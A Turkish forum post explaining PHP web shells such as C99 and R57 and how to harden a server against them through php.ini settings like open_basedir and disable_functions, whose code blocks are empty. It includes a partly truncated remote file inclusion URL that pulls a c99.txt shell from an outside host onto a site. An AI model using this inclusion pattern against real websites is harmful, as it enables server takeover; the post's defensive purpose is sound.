Merhabalar, uzun zamandan gelen bir şey olan SHELL ile hack yönteminden korunmanın yolları bazı işlemlerden geçiyor.
1) SHELL NEDİR?
PHP’ nin en büyük sorunlarından biridir. Dosyanın nereden geldiği ya da nasıl geldiği önemli değil önemli olan o dosyanın sunucuda olup olmamasıdır varsa PHP çalıştırma işlemlerini yapacaktır. Kodların işlenmesi ile geçmiş olsun sizde HACKLENDİNİZ! Onun için varsa sunucu şirketiniz ile irtibata geçip birazdan anlatacağım korunma yollarını talep ediniz eğer sunucu sizinse ve “root” yetkilisi sizseniz gerekli savunmayı kendiniz kolaylıkla yapabilirsiniz.
Başlıca SHELL tipleri, C99, R57, C100, ASPXspy2… devam eder.Bir kaç örnek vermek gerekirse
cL..... adında bir hacker tarafından Kanal 3 hacklenmişti. Burada yaptığı şey yine basit bir shell ile saldırmak olmuştu.
Aynı zaman da bir çok hack timine bağlı insanlar bunu yapmaktadır.
Kısaca özetlemek gerekirsek SHELL sistem de sizi temel yetkilerle yetkilendirir.(Okuma, Yazma, Silme…)
2)SHELL NASIL KULLANILIR?
Bunun bir çok farklı kullanımı bulunmaktadır.Özellikle programcılığın arttığı bu yıllar da bir çok farklı yöntem geliştirildi.Başlıca kullanımlar;
http://www.siteadi.com/index.php?den...z.com/c99.txt?
Bu örnekte index.php’ye c99.txt adlı metni siteden çek bu sayede sitenize c99.txt dosyası upload edildi.PHP değil çalışmaz ki düşüncesine sahip tanıdıklarım olduğu için belirtiyorum. YOK ÖYLE BİR DÜNYA ne yazık ki sistem bu dosyada ki kodları da işliyor.Bazen de upload açıkları oluyor örnek vermek gerekirse bir siteye girdiniz eğer dosyaları kontrol etmeden direk sunucuya taşıyorsa vay haline en fazla bir kaç saat ömrü var demektir.PHP dosyaları her ne olursa olsun sunucuda direkt olarak çalıştırılır.
Sisteme girdikten sonra çıkan ekran;
Bu gördüğünüz bir C99 örneğidir.Sisteme girdikten sonra yalnızca hacker’ın size yapıcağı şovları izlemek ile yetinirsiniz.
3)Korunma Yolları
İşte şimdi işin en güzel “Gardaş biz bu adamları durduramayız mı?” sorusunun cevabı elbette durdurulur.Zekice planlanmış bir savunma duvarı ile kendinizi en azından “lamer” tabirini kullandığımız 10-16 yaş grubu çocukları sitenizden uzak tutar. Gelelim korumaya;
Sunucuya “ROOT” olarak giriş yapın.(Giriş yapmak için genel de putty kullanılır.)
php.ini dosyasını düzenlemek için pico – vi – ya da nano editörlerinden birini kullanabilirsiniz. Ben pico’yu tercih ediyorum.
yada php ayar dosyasını komutuyla açıyoruz…PHP- Kodu:
Open Basedir karşısına yazıyoruz .PHP- Kodu:
Disable functions : Satırına yapıştırın bunları ..PHP- Kodu:
ctrl+x yazın y tıklayıp enterlayın ardından service htttpd restart yapıyoruz.PHP- Kodu:
Suse ise
service apache2 restart yapıyoruz.
Bu korumalardan sonra shell yalnızca CHMOD 777 yetkisine sahip olan klasörlere atılabilir halde olucaktır. vBulletin vb. Forum yazılımı kullanıyorsanız Mutlaka Configleri criptolayınız.
Selamlar Sevgiler
Forumlar
Blog
Store
Giriş & Kayıt ol
-
Hoş geldin Kayıtsız Üye
Facebook ile Baglan & Kayıt ol
Üyeliğinizi aktifleştirmek için e-posta iste
Üyeliğinizi aktif durma getirebilmek için e-posta adresinizin kontrol edilmesi gereklidir. Bu alandan kayıt sırasında vermiş olduğunuz e-posta adresinizi vererek tekrar aktifleştirme postası talep edebilirsiniz ve üyeliğinizi aktif hale getirebilirsiniz...
Facebook ile BaglanBize Yazin